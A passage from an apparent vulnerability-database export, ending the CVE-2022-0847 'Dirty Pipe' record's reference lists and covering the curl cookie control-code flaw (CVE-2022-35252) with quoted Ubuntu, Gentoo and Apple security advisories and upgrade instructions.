{
"problemtype": "Improper initialization (CWE-665) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/166258/dirty-pipe-local-privilege-escalation.html"
},
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/166229/dirty-pipe-linux-privilege-escalation.html"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/166230/dirty-pipe-suid-binary-hijack-privilege-escalation.html"
},
{
"trust": 1.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0847"
},
{
"trust": 1.6,
"url": "https://dirtypipe.cm4all.com/"
},
{
"trust": 1.6,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf"
},
{
"trust": 1.6,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
},
{
"trust": 1.6,
"url": "https://www.suse.com/support/kb/doc/?id=000020603"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2060795"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20220325-0005/"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0847"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/176534/linux-4.20-ktls-read-only-write.html"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2022-0847"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99030761/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-167-09"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2022030060"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50808"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2022030042"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166305/red-hat-security-advisory-2022-0841-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031308"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166516/red-hat-security-advisory-2022-1083-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032843"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166241/ubuntu-security-notice-usn-5317-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1405"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031036"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166280/red-hat-security-advisory-2022-0822-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1027"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022030808"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1064"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-167-09"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042576"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166569/ubuntu-security-notice-usn-5362-1.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-0847/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166812/red-hat-security-advisory-2022-1476-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-file-write-via-dirty-pipe-37724"
},
{
"trust": 0.6,
"url": "https://source.android.com/security/bulletin/2022-05-01"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0944"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2981"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0965"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031421"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0330"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
},
{
"trust": 0.5,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0516"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22942"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0330"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0920"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-22942"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-0920"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0435"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0492"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4154"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-4154"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2022-002"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0413"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0536"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25236"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22822"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22827"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0392"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22824"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23219"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0235"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3999"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23308"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0516"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0392"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0261"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3999"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45960"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-46143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0361"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23852"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0261"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0155"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22826"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-23566"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22825"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0318"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0359"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0155"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46143"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0359"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0413"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22822"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45960"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0144"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0318"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23566"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22823"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0361"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25315"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23218"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0536"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25235"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0144"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23960"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25636"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0001"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24448"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25258"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24959"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/linux"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25375"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0811"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27191"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1476"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0811"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22825"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1083"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22823"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0742"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5362-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-intel-5.13/5.13.0-1010.10"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4155"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0185"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42327"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4090"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23222"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1021.26~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.13.0-1017.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.13/5.13.0-35.40~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.13.0-1017.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.13.0-35.40"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1017.19~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.13/5.13.0-1019.23~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.13.0-1020.22"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.13/5.13.0-1017.19~20.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0002"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.13.0-1019.23"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5317-1"
},
{
"trust": 0.1,
"url": "https://wiki.ubuntu.com/securityteam/knowledgebase/bhi"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.13.0-1021.26"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem-5.14/5.14.0-1027.30"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.13.0-1016.17"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0822"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0819"
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "169268"
},
{
"db": "PACKETSTORM",
"id": "166812"
},
{
"db": "PACKETSTORM",
"id": "166516"
},
{
"db": "PACKETSTORM",
"id": "166569"
},
{
"db": "PACKETSTORM",
"id": "166241"
},
{
"db": "PACKETSTORM",
"id": "166280"
},
{
"db": "PACKETSTORM",
"id": "166265"
},
{
"db": "PACKETSTORM",
"id": "166264"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
},
{
"db": "NVD",
"id": "CVE-2022-0847"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2022-0847",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169268",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166812",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166516",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166569",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166241",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166280",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166265",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166264",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-007117",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-0847",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-10T00:00:00",
"db": "VULMON",
"id": "CVE-2022-0847",
"ident": null
},
{
"date": "2022-03-28T19:12:00",
"db": "PACKETSTORM",
"id": "169268",
"ident": null
},
{
"date": "2022-04-21T15:12:25",
"db": "PACKETSTORM",
"id": "166812",
"ident": null
},
{
"date": "2022-03-29T15:53:19",
"db": "PACKETSTORM",
"id": "166516",
"ident": null
},
{
"date": "2022-04-01T15:43:44",
"db": "PACKETSTORM",
"id": "166569",
"ident": null
},
{
"date": "2022-03-09T15:15:52",
"db": "PACKETSTORM",
"id": "166241",
"ident": null
},
{
"date": "2022-03-11T16:38:56",
"db": "PACKETSTORM",
"id": "166280",
"ident": null
},
{
"date": "2022-03-11T16:31:15",
"db": "PACKETSTORM",
"id": "166265",
"ident": null
},
{
"date": "2022-03-11T16:31:02",
"db": "PACKETSTORM",
"id": "166264",
"ident": null
},
{
"date": "2022-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-522",
"ident": null
},
{
"date": "2023-07-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-007117",
"ident": null
},
{
"date": "2022-03-10T17:44:57.283000",
"db": "NVD",
"id": "CVE-2022-0847",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2024-01-12T00:00:00",
"db": "VULMON",
"id": "CVE-2022-0847",
"ident": null
},
{
"date": "2022-08-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-522",
"ident": null
},
{
"date": "2023-07-12T06:29:00",
"db": "JVNDB",
"id": "JVNDB-2022-007117",
"ident": null
},
{
"date": "2025-11-06T14:50:37.153000",
"db": "NVD",
"id": "CVE-2022-0847",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "166569"
},
{
"db": "PACKETSTORM",
"id": "166241"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Initialization vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-007117"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-522"
}
],
"trust": 0.6
}
}
VAR-202208-2263
Vulnerability from variot - Updated: 2026-03-09 23:13
When curl is used to retrieve and parse cookies from a HTTP(S) server, it accepts cookies using control codes that, when later sent back to a HTTP server, might make the server return 400 responses, effectively allowing a "sister site" to deny service to all siblings. A security vulnerability exists in curl versions 4.9 through 7.84.
==========================================================================
Ubuntu Security Notice USN-5587-1
September 01, 2022
curl vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 22.04 LTS
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
curl could be denied access to HTTP(S) content if it received a specially crafted cookie.
Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries
Details:
Axel Chong discovered that when curl accepted and sent back cookies containing control bytes, a HTTP(S) server might return a 400 (Bad Request) response. A malicious cookie host could possibly use this to cause a denial of service.
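The mechanism described above can be illustrated with a minimal sketch (this is not curl's actual implementation). RFC 6265 restricts cookie values to printable US-ASCII octets, so a value smuggling a control byte back into a Cookie header is what strict servers reject with HTTP 400. The function name `cookie_value_is_safe` is hypothetical, and the check is simplified to the control-byte aspect of the bug:

```python
# Simplified sketch of the CVE-2022-35252 failure mode: curl forwarded
# cookie values containing control bytes, and strict HTTP parsers
# reject such Cookie headers with a 400 response.

def cookie_value_is_safe(value: bytes) -> bool:
    """Return True if every byte is a printable, non-control octet.

    Control bytes are 0x00-0x1F and 0x7F (DEL); anything outside the
    printable range 0x20-0x7E would make a strict server reject the
    request header. (RFC 6265 is stricter still, also excluding
    whitespace, DQUOTE, comma, semicolon, and backslash.)
    """
    return all(0x20 <= b <= 0x7E for b in value)

# A well-formed cookie value passes; one carrying a BEL control byte
# (as a malicious "sister site" could set) does not.
print(cookie_value_is_safe(b"sessionid=abc123"))  # True
print(cookie_value_is_safe(b"evil=\x07payload"))  # False
```

The fix in curl 7.85.0 took the corresponding approach of rejecting incoming cookies whose values contain such control codes, so they are never stored or sent back.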
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 22.04 LTS: curl 7.81.0-1ubuntu1.4 libcurl3-gnutls 7.81.0-1ubuntu1.4 libcurl3-nss 7.81.0-1ubuntu1.4 libcurl4 7.81.0-1ubuntu1.4
Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.13 libcurl3-gnutls 7.68.0-1ubuntu2.13 libcurl3-nss 7.68.0-1ubuntu2.13 libcurl4 7.68.0-1ubuntu2.13
Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.20 libcurl3-gnutls 7.58.0-2ubuntu3.20 libcurl3-nss 7.58.0-2ubuntu3.20 libcurl4 7.58.0-2ubuntu3.20
Ubuntu 16.04 ESM: curl 7.47.0-1ubuntu2.19+esm5 libcurl3 7.47.0-1ubuntu2.19+esm5 libcurl3-gnutls 7.47.0-1ubuntu2.19+esm5 libcurl3-nss 7.47.0-1ubuntu2.19+esm5
Ubuntu 14.04 ESM: curl 7.35.0-1ubuntu2.20+esm12 libcurl3 7.35.0-1ubuntu2.20+esm12 libcurl3-gnutls 7.35.0-1ubuntu2.20+esm12 libcurl3-nss 7.35.0-1ubuntu2.20+esm12
In general, a standard system update will make all the necessary changes.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202212-01
https://security.gentoo.org/
Severity: High
Title: curl: Multiple Vulnerabilities
Date: December 19, 2022
Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365
ID: 202212-01
Synopsis
Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.
Background
A command line tool and library for transferring data with URLs.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All curl users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
References
[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922
[ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923
[ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925
[ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926
[ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945
[ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946
[ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947
[ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576
[ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774
[ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775
[ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776
[ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779
[ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780
[ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781
[ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782
[ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115
[ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205
[ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206
[ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207
[ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208
[ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221
[ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252
[ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260
[ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915
[ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2023-01-23-5 macOS Monterey 12.6.3
macOS Monterey 12.6.3 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213604.
AppleMobileFileIntegrity Available for: macOS Monterey Impact: An app may be able to access user-sensitive data Description: This issue was addressed by enabling hardened runtime. CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing (wojciechregula.blog)
curl Available for: macOS Monterey Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.86.0. CVE-2022-42915 CVE-2022-42916 CVE-2022-32221 CVE-2022-35260
curl Available for: macOS Monterey Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.85.0. CVE-2022-35252
dcerpc Available for: macOS Monterey Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco Talos
DiskArbitration Available for: macOS Monterey Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password Description: A logic issue was addressed with improved state management. CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)
DriverKit Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved checks. CVE-2022-32915: Tommy Muir (@Muirey03)
Intel Graphics Driver Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2023-23507: an anonymous researcher
Kernel Available for: macOS Monterey Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2023-23504: Adam Doupé of ASU SEFCOM
Kernel Available for: macOS Monterey Impact: An app may be able to determine kernel memory layout Description: An information disclosure issue was addressed by removing the vulnerable code. CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. (@starlabs_sg)
PackageKit Available for: macOS Monterey Impact: An app may be able to gain root privileges Description: A logic issue was addressed with improved state management. CVE-2023-23497: Mickey Jin (@patch1t)
Screen Time Available for: macOS Monterey Impact: An app may be able to access information about a user’s contacts Description: A privacy issue was addressed with improved private data redaction for log entries. CVE-2023-23505: Wojciech Regula of SecuRing (wojciechregula.blog)
Weather Available for: macOS Monterey Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an anonymous researcher
